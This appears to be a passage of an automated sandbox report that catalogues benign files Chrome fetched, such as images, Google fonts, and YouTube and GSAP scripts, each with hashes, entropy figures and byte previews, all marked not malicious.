                                                                                                                                                                                                                                                                                          Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||............"................................................K.2<../../....{Y..i..z.j[.M...d-.".GB5.....Y.5.......X0#6...k`i..B.kN.V+a..9.*k..'..\.t...C&g.y.9..UO./_cX7..... 9...w&SR..h......o>..L.....iE0.4.._.ML..Q4@.kA.....f........\......:t1.O......3&R.i...X.`W;x?5M-.....X....b.(....9uf..cy..3....C.i.n.m.M..\..#e.....U......Nrf.t......#.z.D..M......9..d...rf..@.......s...q.`..n|z..`....../#;.......QFZ7.9.&<.IW...Y.M.a.*.He6.Y.e~.h...k.B.F7..u.U...K....n.Q1.P..#Y.@..fuhRy.5f.M./A....#.....uy|.=.&.NC7.....m..mi#..6...'7b$.V=1.*%.32P...c...Ci...;>..-m.S..[J..P^.....N.(..Z..aR..a:.0..=9....k.nL..@.jzN1.../.M#3g0S.-QU[......5.M<....V.Z[j2YX.y[Vj...9.......M#.D.I49|...G`dAwH["..N.......6.V..L..M...F....0.W;..-..V.....NCr...k.....KXDh.....9t..\ Y5...&.#Vw..,{...Cr.G_@d"cs.72Q..C..t......Vy..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 340, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):193769
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.980179307292795
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:1OHwYdknFAPZLp9BVAYpAAwg7cXCqkpQzFgf8DQ6y4c/pFpYkQQ:lYdyiZLHPAxJiWC3pQCfbp/pFukQQ
                                                                                                                                                                                                                                                                                          MD5:965B3B8F90228A96AE600BDBFFC37F06
                                                                                                                                                                                                                                                                                          SHA1:1C266F425F33E76A171985BF060AB91AE849EE0F
                                                                                                                                                                                                                                                                                          SHA-256:75E487EC564F864B0403590BB58EA71222322FB4B4889A338D712E81F7D0C946
                                                                                                                                                                                                                                                                                          SHA-512:7178DB878633C074ECEDAADFA331BF02D5C8F52C55ABAD67DAFB505DDC75D352CABD403313529D71C6B77479B486770D86B41EAB39B3F8775FB40CF1AE265E73
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......T............eiCCPicc..H..W.XS...[......... ...Z..R..!.$........k.Q....+ ......bAEY.uQ..7!.]....;...O..3....e.\T..<i.<>2.565.Ez.P...9.....;...@.....n.D._uQq.s....P......8C...A....A ...@T...T..b.9....*...T8C...m..9._.@.......zV. ...?A.&.J.....8H ..!V.>,/o...C...e..x.o.7.Y.........:.~...(d....gi....*.|..F...U......Sa*...XU.!...u.....QIj{.T.....&.nB~..bS.#..1..}F.$..1\-.4I>7.b#........-...._hm.........~U..(s....7b.W....).S .).$.@L..U.....,.sb.l..xU.6.....j~. S..../.S..m.K.1.| _.....vR....].I.I.<"...\...pu..s.4)A..#...W..)..8.=n%.T. .T.$h....pq...LY~\.:N.0.?*N....D....,..-.L..@..Y....G"...A.....f`FJ...>.@!..".P..........<.U?]@f.hA......<......t.[2x.5..x..&..........W..j.5..G..%1..F."F..q.<.....3.6w......=.)....p..F.=I2O.]..A...."..Z.v......!;d...p.=..6..={A-G...*.....7....FF.C.!d..g..^.,.Z.[.u.......|..M....}o.-..bg...9....,..V.].....z........y$.....TUR.V....I=./....x...rI.8.._...+...c........__o.....y..n.%.........x.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):993
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2946732421267315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:E1tXIbtEHvIYWwmqAK/HJ2cNAXzk5vuHM8aJLtMCRWZ4FhQ:E1tXmtEPT6cLAXzk5kaJL+CwYhQ
                                                                                                                                                                                                                                                                                          MD5:BB54A4724507795586291E5D583C861A
                                                                                                                                                                                                                                                                                          SHA1:B4383DFADD4B7EDF30DD830F07D1C91E717235CB
                                                                                                                                                                                                                                                                                          SHA-256:35C3162B611C3AAA72C002B914BE112F207E0F3BCE58A033EC0437D9AAD814E9
                                                                                                                                                                                                                                                                                          SHA-512:AB2A3015BA3EB4AC1951848EB8F4215DE67D1ECBEE99A3E96B913CDBE2E617110580D9A46F47E071A80F7691C696D41D48A79CE45759B8D1599584432A6E2D4B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.youtube.com/iframe_api?trustedtypes=1
                                                                                                                                                                                                                                                                                          Preview:var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/b0557ce3\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptURL(scriptUrl)}catch(e){}var YT;if(!window["YT"])YT={loading:0,loaded:0};var YTConfig;if(!window["YTConfig"])YTConfig={"host":"https://www.youtube.com"};.if(!YT.loading){YT.loading=1;(function(){var l=[];YT.ready=function(f){if(YT.loaded)f();else l.push(f)};window.onYTReady=function(){YT.loaded=1;var i=0;for(;i<l.length;i++)try{l[i]()}catch(e){}};YT.setConfig=function(c){var k;for(k in c)if(c.hasOwnProperty(k))YTConfig[k]=c[k]};var a=document.createElement("script");a.type="text/javascript";a.id="www-widgetapi-script";a.src=scriptUrl;a.async=true;var c=document.currentScript;if(c){var n=c.nonce||c.getAttribute("nonce");if(n)a.setAttribute("nonce",.n)}var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})()};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (43088)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):43380
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3680879325019255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:L+5LHpwfVyb83wG/B/nE306RAHdAIsxmAK31horUp45:apqgo3wKB/nKRAHOIKS3TjK
                                                                                                                                                                                                                                                                                          MD5:BA1FA78EB4BB49F8A0EEAF8E61708840
                                                                                                                                                                                                                                                                                          SHA1:489BCF6D9C69F0F29F871E0323510C5197859BF5
                                                                                                                                                                                                                                                                                          SHA-256:AD33C2DF9ADA8A663C2147357828F980D0B7CA731EF33EB3C6E4F327C3B2CDA5
                                                                                                                                                                                                                                                                                          SHA-512:A2731344A2412B3F0CD539EAA83B86065A30947D28845CCC5D844D79BCFEC8E71CE5342BFF300AB2D87386EBF4862C942848901105C4CA79D70AF3533A4E7476
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/external_hosted/greensock3/dist/ScrollTrigger.min.js
                                                                                                                                                                                                                                                                                          Preview:/*!. * ScrollTrigger 3.12.5. * https://gsap.com. * . * @license Copyright 2024, GreenSock. All rights reserved.. * Subject to the terms at https://gsap.com/standard-license or for Club GSAP members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e=e||self).window=e.window||{})}(this,function(e){"use strict";function _defineProperties(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}function r(){return Ce||"undefined"!=typeof window&&(Ce=window.gsap)&&Ce.registerPlugin&&Ce}function z(e,t){return~Le.indexOf(e)&&Le[Le.indexOf(e)+1][t]}function A(e){return!!~t.indexOf(e)}function B(e,t,r,n,o){return e.addEventListener(t,r,{passive:!1!==n,capture:!!o})}function C(e,t,r,n){return e.removeEventListener(t,r
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1280x1247, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):198498
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999030161032302
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:gEjlaLCMjjdqvqjZ2zjdooS/PLIQwfPbjRqlzaJ0AiGmE5K0R0TqX5dy:xZ/UYyjMzhoTcPjCNlwomX+
                                                                                                                                                                                                                                                                                          MD5:A0E0DCD3477A0F52EC577739224EB8C2
                                                                                                                                                                                                                                                                                          SHA1:237E7DCF1950E40D814ECD6EE952D7C09680C1A4
                                                                                                                                                                                                                                                                                          SHA-256:20FAB2F7F31A7A4FD3E0A3812304DE7FB0FB6DDCC16A7E8C3C39586822F2E22B
                                                                                                                                                                                                                                                                                          SHA-512:AB6A3FF159432A1204368D43BA5E8F20AE7B1989E76905B95880A6BD4E88DD0C1949717A2B51294250BB36D2F2E08F0403BA0D8421917C591552C44886089004
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFZ...WEBPVP8 N.... ...*....>m2.F.#$..u*X...enP..............6. .T.+.-]=........G...o..C.G..9.E........q.4...+|..>i.Z............x...Z...../.W....._......K.;....7...>.........J...q.......S.C.....?......}..K._.....Z..........O._............l.[.#.7._...?.z!.w......g.........>u.....g.7..........H.o...O..._...............?.....e.wy$.!...pU.!06.....nC|r.......%iZFh4.Ax.y..4.$..Yj&t.k...~..}.....N.....{..3Q..i.YP2.t!.JXg..n.R.2..K..i...]nH.u'o......S..m.4.........Z..-f$..._.Z.,..bR....lA.....s..!..........*....~.t...... .$.Ss.JI.O..0..3........H2.....D.x...!LM.Rk.......E.9......k...\{?5..]4CA.'.J..KZ..g3q......L..V.i....^..i..+.F.....J.T.\.|....k....?f*......V.N-.... ..%7O...(zy@....]...))@...._..0.._....(.....`$&!..1N..<...}.hFZ{....A..k.S?...pv)8x...&....(...l..'..#.j.........6.}.@...dfZS..Ob...&L.&K].......,.i.....`<.,..._...d$.2va...x..Gq...G..K#..9.y.VB.l....F...:.;..{.T.'.b....g....w?.S.<..%+x....P..L ..Hx7..9..M0gV...c..C.m..Z.....+..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 16396, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):16396
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985827035156134
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:Lha7McMVhiB+XmITjsy+wHXjov+sc8idzmAKUcLIS:Va7McSPXpjsy+wHzu+nZdKDUcLr
                                                                                                                                                                                                                                                                                          MD5:A2EDB5C7EB3C7EF98D0EB329C6FB268F
                                                                                                                                                                                                                                                                                          SHA1:5F3037DC517AFD44B644C712C5966BFE3289354C
                                                                                                                                                                                                                                                                                          SHA-256:BA191BF3B5C39A50676E4ECAE47ADFF7F404F9481890530CDBF64252FBB1A57E
                                                                                                                                                                                                                                                                                          SHA-512:CC5644CAF32302521CA5D6FD3C8CC81A6BBF0C44A56C00F0A19996610D65CF40D5BAE6446610F05A601F63DEA343A9000E76F93A0680CFBF1E4CF15A3563A62C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmhjtg.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......@...........?...........................<..l..:.`..:........d.....6.$..(. .....N.....5x.-.v.?..,...<Sn..O/.<.... ......{r2D!v@..?...."..F..\3...-5B....x.).x.$ze._c.l.)~Y..YE.J.e.uW.%).?..T.].q_7y.4...$....*t.F #t8.j...GO..k..&.Ecb.X..m#.........k.s.Fr...<q~.@].PHN?..w.h.f...!h..A,H......*H.R.T.R.*......)...m..}u...".)(J.......>!. .V-....E^.bQ.....U.....u.s?$3.L$...y.........LpB.H.=...."R]|=..._.o..W....N.j2.L.D.....{.<..s.W1I. zHx:..I.......G..~.6..E.&I4.J..h.Y...uM..D.z.u*..)......<...T.......U...k...O......C.!vCy....&..y......t....e...(#.......%v..;.XTS...,....A.w.....K...vv.AI..~y..t..f.....D!...h.."e...h.pQ..{...\..G.......K.[.R....{.%]].0...!i.. ....w..*....4...*`G.2...GD.wZV"...I.......tGQ.<..d..P...o.{......].hI#.....(..0_d..%....E.....?.|...)...U.*"b....1bT.....~.U.[.NJ%....h*W....s.;.Vm.}]..2............<...|q.yW.x....sar!.J. .D...z..GcH.~k.r. >..kY...$2D..B@0.5.6.:...T.xr.~. `M...;.?..b6.Puc,.P.....F.pU.a.f_.xS.....IV.r~......6"..AX.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 23796, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):23796
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.990259365260284
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:384:9WX91eyYrIE/85v202gqY+vz3X54OrugXrTmwnQOW5QcUqiYUi0+6kcPhoeLI:wayjH12LJrX54Or9XPbnDpOR/cPha
                                                                                                                                                                                                                                                                                          MD5:D3A09FF0A84D6DEE3443E534625962FE
                                                                                                                                                                                                                                                                                          SHA1:AC4322C8E6B83FD862443E077B2E22512B704D8E
                                                                                                                                                                                                                                                                                          SHA-256:C09E036A9D6DBC66987914365212D98177D542263D54916DA3848B72E3952993
                                                                                                                                                                                                                                                                                          SHA-512:7BCF7D3114BE82F992E82CE2C96C50A3B3EE2272086AD91C27395E152DEE1A55B4C6100D7D61D97D9CBC3496EF4EDD5606447C5D9F857821EA49D1D1F0E6CCB4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiQUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......\...........\...........................%.....|?HVAR.{.`?STAT..'..../<...........R.0..P.6.$.. . ..B..........[RP;!Us.."H.;...!R5l.3...@....e..g$..T...G.sw.\"..41!..N........f6.4.............#s.:.Ti&.....j.9*4e:..4.I...........`I[...}3G.]..,q...\50..|.g.(..G.&"Lb..N....v.P..9..q.?......B)-.<.c..cL..Z../j]....u("..I.E..n}.6....#[.H...x.+?.F_.2.:T..`..`.I.......)tvn..sQ...;....C.._.$Q$..{....a..........;.4.@(r.:*....P...C.^R ..i..I.._K. .,.O|......d..h.5BKkZ...=R..W.......!..dp..@.\...........7..=d.w.. ..d...'R..E..m.Oq![..B....C.n..`ro.\>...x.2..pn....#n..1.d...1.e`...s....lY..F..@....W........_j..... ...h.bd.......P.D!......_.f.*.....S-...R......C..6.?..tl......@........B...o.*...XP.&"#..).!....Cg.u..9..tQ......)].(s..v...[.I...z...T.R..+...0c.0d}..m.<.......D}e.tb .....<A...R(Xq`.!......-9...v.I@.S...!.q.8.`.:..XCPUG...n..T...h-..3I.\..ko.o.k.....k.^T..b...U.E..[...w.1fX!.J$....^....H...#.#.w(......u...D...H....1........m\.:...iHzP$..U..4]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2180
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.888352761944028
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:bpAYbjn2GuKQgX2pNsrAVZy8SVpDHHxEdqd/ofQ79tE7XhPK+7N:bpAIjUKOpWQY8SVIdQuhPD
                                                                                                                                                                                                                                                                                          MD5:91AC56A852471FA5F940734D493057D0
                                                                                                                                                                                                                                                                                          SHA1:86651F1CB566601941D35029B20CFDC01CCF599F
                                                                                                                                                                                                                                                                                          SHA-256:3009B1EC2FBAFD7D78D9D663EAE16F9DBE390AEA9C4EDFF3A4B19ACCEB178ED9
                                                                                                                                                                                                                                                                                          SHA-512:1E625C973D05C9FF0CDF0F401FBF20B32DA84A07855C919F9948F7C019672EFE7FA124C0717254758EC5E12B05558B9EAA8500B6C24153732D0D59E18C550235
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/QsFLnA2p7QlFCy4Rk-TH0XoaWFilCOzzt8FPO58nI_FXh5wQkjWEMpBKMkJxQJMZio9t6kDMpniv3WrWH7Slxe8BrbMvklg-Ht53iw=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...H...H.....U.G....sRGB........>IDATx..yl.U...of...h...r.n@...!F9.EnQ..Q....(.Z.C.@P.?.?.Q.DA..H x.X+..(...R..n;.......7S4......}.}.....-..l.6...M.&._%.V*....@Q60......F...g.(...*.%............f..PQ]o...:?s.3.(.`..Z7s.0h...4..S.9Rm .>Y.% ~...[.cw&.cZq........_.g]......Y...4.l@......(........% ..X..E......LGd.(.N;>9y.m...*H.c'...@7.I.2.h .a...?.........6nV. .....[.81..&.".g..nQ.t.L:..6..}..m..._.........m+.....y.Au...[z_........i.......wc........K......x.a'~q...\3...|.....T....f8\.....6.......k&......0.a...#t S.q.3.Z.=....6.....v..p;L..;..5.k.A....%.d*F...L.V.1...*S........Y-.$.E...FzM.%.F..1.[v...p]...XH.Z...Up......f.''1.Q.......x.7..8..U..[...z...+Z}...@.x.j...MRp..U.).....X...g...?..[.ZDiRA..........]9.j].4.9.....4...f....v*..N..f.....!...R@4]....R....n.S.k...........E...c...^.....].A.1..2@..lpL..F#F.....?....^|k.'...i..*......(..p....A.i......[....9...(.@p..9.....VA.......@.........:zip.....,.=.Q..-.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):17689
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.1713605102899516
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YebzDKW6zOqwN9vAwtZALfLuVj8PVyswrkTusyJgwc9DjoudkM/z7MGGWhbP9tm+:tlobuMML9Omcp
                                                                                                                                                                                                                                                                                          MD5:53B618EA4BCB5890F59C7FB47B16CB9B
                                                                                                                                                                                                                                                                                          SHA1:C030C8A38FD6E19D00F9DF721B30689117E7E157
                                                                                                                                                                                                                                                                                          SHA-256:B0D519B3ED3EB1A54376FA3920801E3743BBF0615973F39DE0C41EAEC65AF474
                                                                                                                                                                                                                                                                                          SHA-512:6602FEAEA485C761B13C9F5FC8A28E342758305854941D29251F4536825F83822196470FD051DDB161E3FF7C57C8C8431A62B7EB13F3D74D7D38B355ED823C61
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/xjs/_/js/md=2/k=xjs.s.en_US.u9kBZBte-Es.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAACBAIEAAAAAABQAAAAAAAAAAAAAAAAAAAAAIBAAgJAQAAACAABwAAAAICAAABAAAAERAAAEiAAAAAgAAAAAAAAAAIgAYAIAAAAAAC4AABAoAgAAEAAAgAEAAIAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAACCEA_AAAAAAAAAAAAAAgAAAAAAAYAAAAAAAAAAIAAAAAQIADAABmAAAAAAAAAAO4DgOABgCGFBQAAAAAAAAAAAAAAAIAEwViQgIIAAAAAAAAAAAAAAAAAAAAAKUETBwg/rs=ACT90oGlQ_qSjncWQjAN6Nnblp3ZMWaSlA
                                                                                                                                                                                                                                                                                          Preview:{"chunkTypes":"1000011111110011110001000010110100000011111111111111111111111111111111011011111111111010111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111110111101111111113101101111111111110111111111111110111111111111111100011010111111111111111111111111111110101002222121212121212121212121212121222222212121212121212121212121212121212121212222221222212212221221221221221221221221221221221221221221221221221221221221221221221221221221221222122122122122122122121212122121212121212121212121212121212112121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212222212121222222222122212121212211221212121212112121121212121212121212121212121212121221221221
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (561)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):31666
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.397564672661937
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:npzjVkjElIVonxb6qOq+WZT8HjiyUv5aYe9hiVw6rCRNbzgM/BwNwgmx/tXTxw4k:nxjNl3x8XBHa4iVwmytzimx/hcg6/K3w
                                                                                                                                                                                                                                                                                          MD5:B0A74586B183DB7082EA48B6EA43EDE3
                                                                                                                                                                                                                                                                                          SHA1:5CEC77CD9C2A7EC472327533B0E32D2D5DA8634D
                                                                                                                                                                                                                                                                                          SHA-256:36CB859BE5A639C678F317D76C5C589DA1B5E08820FCCE41D67C38B517EFA959
                                                                                                                                                                                                                                                                                          SHA-512:88A1BA500A6CA668014C54D442DCA1487C1FFBE0E57BAA53A4F4E9C0038F12B981F3A1FC38B598EA4822EB0E086FAF0A4C5DC8601C9BB91C2B6B6BFC3E0945A2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.youtube.com/s/player/b0557ce3/www-widgetapi.vflset/www-widgetapi.js
                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var r=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var t=ba(this);function u(a,b){if(b)a:{var c=t;a=a.split(".");for(var d=0;d<a.length-1;d++){var g=a[d];if(!(g in c))break a;c=c[g]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&r(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(k){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(k||"")+"_"+g++,k)}.function c(k,e){this.g=k;r(this,"description",{configurable:!0,writable:!0,value:e
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 390x390, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):24425
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.978531074331414
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:/ob7Fx2CDs+rcRRpyEwI8iSWhkjk4zBVMn8q4VJmCqDqvZiYBgulTqofd:Ab7F0+4RnL8iAPtanvolqDqvZ/Zf
                                                                                                                                                                                                                                                                                          MD5:282529ADDBF04EEBCA8598DCC5FDB2CF
                                                                                                                                                                                                                                                                                          SHA1:6E1CE2E4C2B42FD1D6FDBEF5E066463EB293044C
                                                                                                                                                                                                                                                                                          SHA-256:FF50E9AFDCB06BFF0AC242BAB337A2E261DC225EFEE343C9A7332D5A24705CB6
                                                                                                                                                                                                                                                                                          SHA-512:9C25AEAFC017E5A54F39AF6E5FC93D7ADF95BFD974A95B35935057715653F079DAA10D7C542C6B366C70588304457E9915AB3AA8A0DF6634EE9DB69C17E9BB95
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................M.........................!.1AQ.."aq...2....BR...#b...3r...$CSs.c.....%..4dt................................3........................!1"AQ..2Baq........#3Cb.............?...D..Ma..l..jJ......c.{.....Ug..#N.U...1..M=....3...Qt....h......>...Q.NE.B.:.M.........E4.p.:..e!.(.%4.D..Q....(.]...U...+......2....=y.xz.F...........4..U........M.....k2.;..Z....9Y6.7.A.....I(..r.....{^...]..t .....6;...X.HV.$.M.veG4.\Wi.Z.j^.+[.2.`Jo..d....{...q..!k...U".W.Q.jQ.T...V.....w..D...l.]J..un.*....[vi.sn.5.C.F..^.+....@.G..<.......I...VQd.....E..3....h.,uA...n.....r.Jo&X&.;..I9g.I!.x.R.r.eH..t..G..z.j...j..&..5E.&1I....=)+..i.T...<.6.kUJ...'.........>..K7..s.S.gk..O.}ma..sk.Fc.....S.....-4...z.C,.k.Z....R.S..9..mU.....*.v2`m.I.;73..t.UaNQ........c...B.l..y0.rRxd
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x473, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):26862
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.534530616060825
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:EgqYNg7AZmhtGEQYGlp61rWfSyfLexRMxfDX4xWhfkTwyV+YPpqpupJyZfIhDH60:+YyptYGrWVLTroxWtDAgZ2abkao
                                                                                                                                                                                                                                                                                          MD5:67D31C588154659871177519FD5EF5E2
                                                                                                                                                                                                                                                                                          SHA1:8B8B86F5EE02F669B041325CFDACADD7F70EAD14
                                                                                                                                                                                                                                                                                          SHA-256:31A8D1A848500C964DC07E2ABA84EB9ACF37893C7913BEE319A769E6779722B1
                                                                                                                                                                                                                                                                                          SHA-512:F01FBAC33958D33CF4DF3A1EFD2E5DA7B901F9C67C94E8F0F6D1367BBAB61615342112412864A7247F5199A618FAA5EDAC5D77C4446A725F7CDA7F68B43A5AEE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/a7/c6/436bacd144bda836737c139c3fc1/c9bw9qpyrluxwjs.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF.............8Photoshop 3.0.8BIM........8BIM.%..................B~... ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg... ... vcgt...@...0ndin...p...>mmod.......(vcgp.......8bTRC........gTRC........aabg... ... aagg... ... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........nlNL........fiFI........itIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK........zhCN........ruRU........enGB........frFR........ms..........hiIN........thTH........caES........enAU........esXL........deDE........enUS........ptBR........plPL........elGR........svSE........trTR........ptPT........jaJP....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1058
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.601570405857222
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/76mx3ysRgWwZT+1WV71HzFlrGnHQbpY6ziKyLYsuaa1v3AWbqVrr5ehLfqwFb:KBzgWwSEJinHsY6zpj1/iMZfT
                                                                                                                                                                                                                                                                                          MD5:E1F4F05BDBFD1A5F3BB4F2E371B29219
                                                                                                                                                                                                                                                                                          SHA1:C703DAFE08C390E3ADCE5BFCF9028DD6361BE32D
                                                                                                                                                                                                                                                                                          SHA-256:7AC05A958E8FF05646E10709BD36911C6C9554E0245941D5207F9EF4768EE1A0
                                                                                                                                                                                                                                                                                          SHA-512:8A3BA979BE45494EB3B79CAD43F63F5E75B75A1A1B25FDC5AB84919F3667D455862DFA29FE21B709A1E89CEF289345EF67E38396D1DB1F4D638A4C6003241667
